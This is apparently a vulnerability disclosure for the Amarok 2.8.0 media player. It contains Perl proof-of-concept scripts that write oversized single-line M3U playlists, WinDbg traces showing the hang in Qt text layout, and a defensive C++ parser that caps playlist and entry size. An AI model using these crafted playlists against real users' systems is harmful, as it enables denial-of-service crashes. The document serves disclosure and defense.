Description
A remote user can create a specially crafted M3U media playlist file that, when loaded by the target user, triggers a memory leak: Amarok 2.8.0 continues to consume resources over time, eventually exhausting them.
Impact
An attacker might be able to launch a DoS (denial of service) attack by crashing the application, or take advantage of other unexpected program behaviour resulting from low resources.
Steps Followed
- Craft an M3U media playlist file, using a perl script:
use strict;
use warnings;
my $file = "test_big.m3u";
my $junk = "\x41" x 6368545;   # 6,368,545 bytes of 'A' on a single line
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";
- Open Amarok -> Play Media, and select the crafted m3u file, test_big.m3u.
- The application starts hogging the processor at 100%.

- The PID is attached to WinDbg.

- Identified the thread causing the problem and made it the current thread.
0:012> !runaway 3
 User Mode Time
  Thread       Time
   0:a34       0 days 0:37:12.265
   8:b38       0 days 0:00:01.578
   7:710       0 days 0:00:01.187
   5:d40       0 days 0:00:00.734
   2:ee0       0 days 0:00:00.125
  10:af8       0 days 0:00:00.078
  18:b9c       0 days 0:00:00.031
  22:1430      0 days 0:00:00.000
  20:1344      0 days 0:00:00.000
  17:374       0 days 0:00:00.000
  13:3e4       0 days 0:00:00.000
  12:1304      0 days 0:00:00.000
  11:16a4      0 days 0:00:00.000
   9:3d4       0 days 0:00:00.000
   6:778       0 days 0:00:00.000
   4:aa8       0 days 0:00:00.000
   3:ad4       0 days 0:00:00.000
   1:ca4       0 days 0:00:00.000
 Kernel Mode Time
  Thread       Time
   0:a34       0 days 0:01:25.328
   8:b38       0 days 0:00:00.250
  10:af8       0 days 0:00:00.125
   9:3d4       0 days 0:00:00.078
  18:b9c       0 days 0:00:00.031
  22:1430      0 days 0:00:00.015
  13:3e4       0 days 0:00:00.015
   7:710       0 days 0:00:00.015
   5:d40       0 days 0:00:00.015
   2:ee0       0 days 0:00:00.015
  20:1344      0 days 0:00:00.000
  17:374       0 days 0:00:00.000
  12:1304      0 days 0:00:00.000
  11:16a4      0 days 0:00:00.000
   6:778       0 days 0:00:00.000
   4:aa8       0 days 0:00:00.000
   3:ad4       0 days 0:00:00.000
   1:ca4       0 days 0:00:00.000
0:012> g
(b84.398): Break instruction exception - code 80000003 (first chance)
eax=7ff4e000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000
eip=775a40f0 esp=0c30ff5c ebp=0c30ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
775a40f0 cc              int     3
0:014> !runaway 3
 User Mode Time
  Thread       Time
   0:a34       0 days 0:50:29.000
   8:b38       0 days 0:00:01.578
   7:710       0 days 0:00:01.187
   5:d40       0 days 0:00:00.734
   2:ee0       0 days 0:00:00.125
  10:af8       0 days 0:00:00.078
  18:b9c       0 days 0:00:00.031
  22:1430      0 days 0:00:00.000
  20:1344      0 days 0:00:00.000
  17:374       0 days 0:00:00.000
  14:398       0 days 0:00:00.000
  13:3e4       0 days 0:00:00.000
  12:df8       0 days 0:00:00.000
  11:16a4      0 days 0:00:00.000
   9:3d4       0 days 0:00:00.000
   6:778       0 days 0:00:00.000
   4:aa8       0 days 0:00:00.000
   3:ad4       0 days 0:00:00.000
   1:ca4       0 days 0:00:00.000
 Kernel Mode Time
  Thread       Time
   0:a34       0 days 0:01:45.625
   8:b38       0 days 0:00:00.250
  10:af8       0 days 0:00:00.140
   9:3d4       0 days 0:00:00.078
  18:b9c       0 days 0:00:00.031
  22:1430      0 days 0:00:00.015
  13:3e4       0 days 0:00:00.015
   7:710       0 days 0:00:00.015
   5:d40       0 days 0:00:00.015
   2:ee0       0 days 0:00:00.015
  20:1344      0 days 0:00:00.000
  17:374       0 days 0:00:00.000
  14:398       0 days 0:00:00.000
  12:df8       0 days 0:00:00.000
  11:16a4      0 days 0:00:00.000
   6:778       0 days 0:00:00.000
   4:aa8       0 days 0:00:00.000
   3:ad4       0 days 0:00:00.000
   1:ca4       0 days 0:00:00.000
0:014> ~
   0  Id: b84.a34 Suspend: 1 Teb: 7ffdf000 Unfrozen
   1  Id: b84.ca4 Suspend: 1 Teb: 7ffde000 Unfrozen
   2  Id: b84.ee0 Suspend: 1 Teb: 7ffdd000 Unfrozen
   3  Id: b84.ad4 Suspend: 1 Teb: 7ffdc000 Unfrozen
   4  Id: b84.aa8 Suspend: 1 Teb: 7ffdb000 Unfrozen
   5  Id: b84.d40 Suspend: 1 Teb: 7ffd9000 Unfrozen
   6  Id: b84.778 Suspend: 1 Teb: 7ffd7000 Unfrozen
   7  Id: b84.710 Suspend: 1 Teb: 7ffd6000 Unfrozen
   8  Id: b84.b38 Suspend: 1 Teb: 7ffd5000 Unfrozen
   9  Id: b84.3d4 Suspend: 1 Teb: 7ffd4000 Unfrozen
  10  Id: b84.af8 Suspend: 1 Teb: 7ffd3000 Unfrozen
  11  Id: b84.16a4 Suspend: 1 Teb: 7ff4f000 Unfrozen
  12  Id: b84.df8 Suspend: 1 Teb: 7ffd8000 Unfrozen
  13  Id: b84.3e4 Suspend: 1 Teb: 7ff4d000 Unfrozen
. 14  Id: b84.398 Suspend: 1 Teb: 7ff4e000 Unfrozen
  17  Id: b84.374 Suspend: 1 Teb: 7ff48000 Unfrozen
  18  Id: b84.b9c Suspend: 1 Teb: 7ff47000 Unfrozen
  20  Id: b84.1344 Suspend: 1 Teb: 7ff4a000 Unfrozen
  22  Id: b84.1430 Suspend: 1 Teb: 7ff45000 Unfrozen
0:014> ~0s
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Amarok\bin\QtCore4.dll -
eax=00000002 ebx=0f40d4b0 ecx=00000000 edx=00000002 esi=002269b8 edi=00226a00
eip=6a24b5d3 esp=002266b0 ebp=002266d8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
QtCore4!Z17qt_localeFromLCIDm+0x2964:
6a24b5d3 0fb755e4        movzx   edx,word ptr [ebp-1Ch]   ss:0023:002266bc=0000
- Stack Backtrace
0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
002266d8 6a24d748 0f2c4bc0 0f4108cc 00000000 QtCore4!Z17qt_localeFromLCIDm+0x2964
00226738 6a254bcd 0af21520 0ade9508 0ad96020 QtCore4!Z17qt_localeFromLCIDm+0x4ad9
00226788 6a254ecb 0af21520 00000001 0ad96020 QtCore4!Z17qt_localeFromLCIDm+0xbf5e
002267d8 6a25528f 0af21520 00000001 0ad96020 QtCore4!Z17qt_localeFromLCIDm+0xc25c
00226828 6a267a7e 0af21520 0ad96020 00000000 QtCore4!Z17qt_localeFromLCIDm+0xc620
00226868 6a266a7b 002269b8 00000000 0022690c QtCore4!Z17qt_localeFromLCIDm+0x1ee0f
00226898 6a26817b 002269b8 00ede3b0 010e465a QtCore4!Z17qt_localeFromLCIDm+0x1de0c
002268c8 6a26f9bf 002269b8 01088e45 0022780c QtCore4!Z17qt_localeFromLCIDm+0x1f50c
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Amarok\bin\QtGui4.dll -
002268e8 009ac901 002269b8 00000000 ffffffff QtCore4!Z10qShapeItemP14HB_ShaperItem_+0x11
002271f8 009ab769 0000020a 00000000 00227258 QtGui4!ZNK11QTextEngine21shapeTextWithHarfbuzzEi+0xc6d
002272d8 009ad74e 0000020a 00227314 00227304 QtGui4!ZNK11QTextEngine9shapeTextEi+0xa3
00227368 009bbd26 0000020a 00227490 0022740c QtGui4!ZNK11QTextEngine5shapeEi+0x268
00227568 009bb345 7fffffff 00000000 00227668 QtGui4!ZN9QTextLine13layout_helperEi+0x2b0
00227598 009b833f 7fffffff 00227780 00227610 QtGui4!ZN9QTextLine13setNumColumnsEi+0x71
00227668 00e2b7ea 00000001 00000000 00227708 QtGui4!ZN11QTextLayout10createLineEv+0xf3
00227728 00e2c40a 0022a060 0022a050 00000001 QtGui4!ZNK17QGraphicsTextItem10textCursorEv+0xb8
0022a0e8 00e53426 0022b90c 090aff58 0933e000 QtGui4!ZN23QGraphicsSimpleTextItem5paintEP8QPainterPK24QStyleOptionGraphicsItemP7QWidget+0x18a
0022a1e8 00e52c60 09307ec0 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x469c
0022a528 00e5379b 09307ec0 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
0022a628 00e52c60 09404df8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11
0022a968 00e5379b 09404df8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
0022aa68 00e52c60 06314e78 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11
0022ada8 00e5379b 06314e78 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
0022aea8 00e52c60 090a9068 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11
0022b1e8 00e5379b 090a9068 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
0022b2e8 00e52c60 060a65a8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11
0022b628 00e520ca 060a65a8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
0022b798 00e76445 0022b90c 00000000 061260b0 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3340
0022bb58 0079820f 0022c408 6a370000 0022bbb8 QtGui4!ZN13QGraphicsView10paintEventEP11QPaintEvent+0xb6b
0022bd48 00be9562 0022c408 00000000 feedbab1 QtGui4!ZN7QWidget5eventEP6QEvent+0xaff
0022bd78 00c9b3bc 0022c408 0022bdb8 0022bdb8 QtGui4!ZN6QFrame5eventEP6QEvent+0x3c
0022bd98 00e72c67 0022c408 00000000 0022bdf8 QtGui4!ZN19QAbstractScrollArea13viewportEventEP6QEvent+0x76
0022be68 00f94b24 0022c408 0933e004 0022be88 QtGui4!ZN13QGraphicsView13viewportEventEP6QEvent+0x8ad
0022be88 00f929d5 0022c408 00000000 09317da8 QtGui4!ZN26QAbstractScrollAreaPrivate13viewportEventEP6QEvent+0x28
0022bea8 6a2ff68e 0933e000 0022c408 0022bed8 QtGui4!ZN24QStyleOptionGraphicsItemC1ERKS_+0x10f5
0022bed8 00743352 0933e000 0022c408 0022bf08 QtCore4!ZN23QCoreApplicationPrivate29sendThroughObjectEventFiltersEP7QObjectP6QEvent+0x9e
0022bf08 00742f05 0933e000 0022c408 0022bf38 QtGui4!ZN19QApplicationPrivate13notify_helperEP7QObjectP6QEvent+0x140
0022c2e8 6a2ff40f 0933e000 0022c408 00000048 QtGui4!ZN12QApplication6notifyEP7QObjectP6QEvent+0x2c59
0022c378 00f4ccb1 0933e000 0022c408 00000048 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0xc1
0022c398 0078e8d8 0933e000 0022c408 00000000 QtGui4!ZN16QAccessibleEvent8setValueERK7QString+0x711
0022c518 0078fbde 0af99dd0 0022c5a8 0022c5f4 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x8e2
0022c628 0078ed85 0af99dd0 06125d6c 00000001 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0
0022c7a8 0078fbde 0af99dd0 0022c838 0022c884 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f
0022c8b8 0078ed85 0af99dd0 09311e94 00000000 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0
0022ca38 0078fbde 0af99dd0 0022cac8 0022cb14 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f
0022cb48 0078ed85 0af99dd0 09311d3c 00000005 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0
0022ccc8 0078fbde 0af99dd0 0022cd58 0022cda4 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f
0022cdd8 0078fa66 0af99dd0 05fa307c 00000045 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0
0022cee8 0078ed85 0af99dd0 05fa307c 00000046 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x368
0022d068 0096aa6a 0af99dd0 0022d17c 0022d174 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f
0022d2b8 00783991 0022d2d8 00000000 feedbab1 QtGui4!ZN14QWidgetPrivate10scrollRectERK5QRectii+0x1a6e
0022d338 007988db 0022d368 00000000 0022d4a8 QtGui4!ZN14QWidgetPrivate16syncBackingStoreEv+0xc7
0022d528 00c1105e 0a3a9580 00000000 0933e9e0 QtGui4!ZN7QWidget5eventEP6QEvent+0x11cb
0022d5e8 00743375 0a3a9580 0a3a9580 0022d618 QtGui4!ZN11QMainWindow5eventEP6QEvent+0x57a
0022d618 00742f05 05fb06f8 0a3a9580 0916ce78 QtGui4!ZN19QApplicationPrivate13notify_helperEP7QObjectP6QEvent+0x163
0022d9f8 6a2ff40f 05fb06f8 0a3a9580 6a417bb7 QtGui4!ZN12QApplication6notifyEP7QObjectP6QEvent+0x2c59
0022da88 6a38a4f3 05fb06f8 0a3a9580 04e5255c QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0xc1
0022daa8 6a3005f9 05fb06f8 0a3a9580 0022db08 QtCore4!ZN16QCoreApplication9sendEventEP7QObjectP6QEvent+0x3b
0022db58 6a32b452 00000000 00000000 04e52540 QtCore4!ZN23QCoreApplicationPrivate16sendPostedEventsEP7QObjectiP11QThreadData+0x37d
0022dc28 75bcc4e7 00000006 0022dcc4 75bcc4e7 QtCore4!Z13winGetMessageP6tagMSGP6HWND__jj+0x42a
0022dc60 75bcc5e7 6a32b144 00040216 00000401 USER32!InternalCallWinProc+0x23
0022dcd8 75bccc19 00000000 6a32b144 00040216 USER32!UserCallWinProcCheckWow+0x14b
0022dd38 75bccc70 6a32b144 00000000 0022fb88 USER32!DispatchMessageWorker+0x35e
0022dd48 6a32cc8c 0022fb14 00000002 00000000 USER32!DispatchMessageW+0xf
0022fb88 007b3880 00000000 0022fbfc 0022fe68 QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x6e8
0022fc18 6a2fd2a1 0022fc78 00000010 6a387454 QtGui4!Z24qt_getRegisteredWndClassv+0x513
0022fc98 6a2fd48a 0022fcf8 00000020 0022fd10 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0xed
0022fd28 6a2ffb7e 0022fd94 0022fcf0 0022fd68 QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0x1b2
0022fdb8 007402aa 0022fe7c 0040f7ee 0022ffc4 QtCore4!ZN16QCoreApplication4execEv+0x160
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Amarok\bin\amarok.exe
0022fdd8 0040ceb7 0000000f 6a2ffc80 0022fe50 QtGui4!ZN12QApplication4execEv+0x1a
0022feb8 004013ee 04e8fe20 00000027 00000001 amarok+0xceb7
0022ff88 774e3c45 7ffda000 0022ffd4 775d37f5 amarok+0x13ee
0022ff94 775d37f5 7ffda000 77430b78 00000000 kernel32!BaseThreadInitThunk+0xe
0022ffd4 775d37c8 004014e0 7ffda000 00000000 ntdll!__RtlUserThreadStart+0x70
0022ffec 00000000 004014e0 7ffda000 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> g
QtCore4!Z17qt_localeFromLCIDm+0x4ad9
eax=00000000 ebx=0f40d4b0 ecx=00000000 edx=00000000 esi=002269b8 edi=00226a00
eip=6a24d748 esp=002266e0 ebp=00226738 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
QtCore4!Z17qt_localeFromLCIDm+0x4ad9:
6a24d748 8945dc          mov     dword ptr [ebp-24h],eax  ss:0023:00226714=0000ffff
0:000>
- Identified the offending function
0022a968 00e5379b 09307e60 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
- Now craft a big M3U media playlist file, using a perl script:
use strict;
use warnings;
my $file = "DoS.m3u";
my $junk = "\x41" x 31842721;   # 31,842,721 bytes of 'A' on a single line
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";
- Open Amarok -> Play Media, and select the crafted m3u file, DoS.m3u.

- Amarok crashes.
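The backtrace above shows the oversized single-line playlist entry reaching Qt's text layout code (QTextEngine shaping, QGraphicsSimpleTextItem painting) unchecked. As an added defensive example, not Amarok's or Qt's own code, the following plain C++ M3U parser enforces a cap on total playlist size and on the length of any single entry before a line is handed onward to the GUI; the limit values, function names and the constructed sample inputs are assumptions, not values taken from Amarok.

```cpp
#include <cstddef>
#include <sstream>
#include <string>
#include <vector>

// Assumed limits (not Amarok's): a playlist entry is a path or URL, so a few
// thousand characters is already generous; the PoC above used one 6 MB line.
constexpr std::size_t kMaxPlaylistBytes = 1 * 1024 * 1024;  // 1 MiB
constexpr std::size_t kMaxEntryLength   = 4096;

struct M3uResult {
    bool ok = false;                   // false if a limit was exceeded
    std::string error;                 // reason for rejection, if any
    std::vector<std::string> entries;  // non-comment, non-empty lines
};

// Parse a plain M3U/M3U8 body, rejecting it before any line reaches
// a text layout or media probe if the size or entry-length cap is exceeded.
M3uResult parseM3u(const std::string& body) {
    M3uResult r;
    if (body.size() > kMaxPlaylistBytes) {
        r.error = "playlist exceeds size limit";
        return r;
    }
    std::istringstream in(body);
    std::string line;
    while (std::getline(in, line)) {
        if (!line.empty() && line.back() == '\r') line.pop_back();  // CRLF files
        if (line.size() > kMaxEntryLength) {
            r.error = "playlist entry exceeds length limit";
            r.entries.clear();
            return r;
        }
        if (line.empty() || line[0] == '#') continue;  // #EXTM3U, #EXTINF, comments
        r.entries.push_back(line);
    }
    r.ok = true;
    return r;
}

// Constructed inputs: a small valid playlist and a PoC-style single huge line.
int main() {
    const std::string good = "#EXTM3U\r\n#EXTINF:123,Song\r\n/music/a.mp3\r\nhttp://example.invalid/b.ogg\r\n";
    const std::string bad(6368545, 'A');
    M3uResult g = parseM3u(good), b = parseM3u(bad);
    return (g.ok && g.entries.size() == 2 && !b.ok) ? 0 : 1;
}
```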

